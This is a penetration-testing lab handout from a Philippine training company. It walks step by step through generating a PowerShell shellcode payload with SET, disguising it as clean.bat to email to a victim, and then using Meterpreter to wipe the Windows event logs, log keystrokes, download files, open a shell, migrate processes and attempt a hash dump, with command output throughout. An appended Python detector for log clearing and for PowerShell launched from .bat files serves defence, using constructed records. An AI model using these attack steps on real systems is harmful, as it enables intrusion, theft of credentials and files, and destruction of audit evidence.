NEXUS EDUCATION SERVICES
📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net
This is the intellectual property of Nexus Education Services. Reproduction and distribution without consent will be prosecuted in a court of law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other Purposes], otherwise known as the Intellectual Property Code of the Philippines.
Social Engineering Penetration Testing using PowerShell Attack
As a responsible ethical hacker, security engineer or penetration tester you should be familiar with the tools used to perform a penetration test.
HANDS-ON LAB:
Lab Objectives:
Lab Duration:
▪ Time: 45 minutes
Lab Environment
▪ You need internet connection
Lab Tasks
Tools
Step-by-Step Instructions
Open a new terminal and run SET:
setoolkit
1) Social-Engineering Attacks
9) Powershell Attack Vectors
1) Powershell Alphanumeric Shellcode Injector
Enter the IP address of the Kali machine: 192.168.145.130
Accept the default port 443 and press Enter.
Type yes.
! Open a new terminal and look for the PowerShell injection file
ls /root/.set/reports/powershell
You will see a file called x86_powershell_injection.txt.
cp /root/.set/reports/powershell/x86_powershell_injection.txt ~/Desktop
Rename x86_powershell_injection.txt to clean.bat and send it to the victim by email.
! I have already copied the file to the Windows Server 2012 desktop; just run clean.bat.
Go back to Kali, where the Meterpreter handler is open, and type sessions -i 1
msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
Type sysinfo:
meterpreter > sysinfo
Computer : NEXUSSERVER
OS : Windows 2012 R2 (Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
Type ? to see all available commands.
Go to Windows and run eventvwr; note that the Windows logs hold thousands of event records, which are about to disappear.
Go back to Kali and type clearev:
meterpreter > clearev
[*] Wiping 1612 records from Application...
[*] Wiping 3201 records from System...
[*] Wiping 9106 records from Security...
! Launch calc on the target
execute -f calc
! Start capturing keystrokes
keyscan_start
! Dump the keystroke buffer; you will see all keystrokes typed on the Server 2012 machine
keyscan_dump
! Stop keylogger
keyscan_stop
! Go to the Windows directory; you now have access to the Windows server's C: drive
cd c:\windows
pwd
ls
! Download a file from the victim's PC to your Kali machine
pwd
cd C:\Users\Administrator\pictures
download cat.jpg
meterpreter > shell
Process 452 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
meterpreter > execute -f cmd.exe -i -H
Process 3708 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\Downloads>ps
meterpreter > run post/windows/manage/migrate
[*] Running module against NEXUSSERVER
[*] Current server process: powershell.exe (2844)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 4068
[+] Successfully migrated to process 4068
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY f93580f87e94025a7a009eb1886569f1...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
Result of penetration testing: by now you should know how an attacker sends a keylogger and gathers the username and password, which are then used for a remote connection to gain root access.
Question: As a Nexus ethical hacker, what should you do to protect your company from PowerShell attacks?
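One defender-side answer to that question, as an added example that is not part of the Nexus handout: a small Python triage rule run over constructed Windows event records that flags the two traces this lab leaves on the victim, the event logs being wiped (the clearev step) and powershell.exe being started by cmd.exe out of a user folder (what double-clicking the renamed clean.bat produces). Event IDs 1102, 104 and 4688 are real Windows IDs; the record field names and the sample records are constructed for this example.

```python
"""Flag the post-exploitation traces this lab leaves on the Windows victim.

Constructed records modelled loosely on Windows event log entries:
1102 = Security log cleared, 104 = System/Application log cleared,
4688 = process creation. Field names are simplified, not Microsoft's.
"""
from pathlib import PureWindowsPath

LOG_CLEARED = {("Security", 1102), ("System", 104), ("Application", 104)}
USER_DIRS = ("downloads", "desktop", "appdata")  # where mailed .bat files land


def is_log_clear(rec):
    """True for an event saying an event log was wiped (meterpreter clearev)."""
    return (rec.get("channel"), rec.get("event_id")) in LOG_CLEARED


def is_suspicious_powershell(rec):
    """True for powershell.exe started by cmd.exe from a user-writable folder.

    That is the chain a user running clean.bat produces:
    explorer.exe -> cmd.exe (interpreting the .bat) -> powershell.exe.
    """
    if rec.get("event_id") != 4688:
        return False
    proc = PureWindowsPath(rec.get("new_process", "")).name.lower()
    parent = PureWindowsPath(rec.get("parent_process", "")).name.lower()
    cwd_parts = [p.lower() for p in PureWindowsPath(rec.get("cwd", "")).parts]
    return proc == "powershell.exe" and parent == "cmd.exe" and any(d in cwd_parts for d in USER_DIRS)


def triage(records):
    """Return (rule, record) hits in input order; one rule per record."""
    hits = []
    for rec in records:
        if is_log_clear(rec):
            hits.append(("event_log_cleared", rec))
        elif is_suspicious_powershell(rec):
            hits.append(("powershell_from_bat_in_user_dir", rec))
    return hits


SAMPLE = [  # constructed: .bat run from Downloads, admin PowerShell use, then clearev
    {"event_id": 4688, "channel": "Security", "new_process": r"C:\Windows\System32\cmd.exe",
     "parent_process": r"C:\Windows\explorer.exe", "cwd": r"C:\Users\Administrator\Downloads"},
    {"event_id": 4688, "channel": "Security", "new_process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_process": r"C:\Windows\System32\cmd.exe", "cwd": r"C:\Users\Administrator\Downloads"},
    {"event_id": 4688, "channel": "Security", "new_process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_process": r"C:\Windows\explorer.exe", "cwd": r"C:\Windows\System32"},  # benign admin use
    {"event_id": 1102, "channel": "Security"},
    {"event_id": 104, "channel": "System"},
]

if __name__ == "__main__":
    for rule, rec in triage(SAMPLE):
        print(rule, rec.get("event_id"), rec.get("new_process", ""))
```

Only the second, fourth and fifth sample records are flagged; the benign PowerShell launch from System32 is not, which is the point of checking the parent process and working directory together rather than alerting on every powershell.exe start.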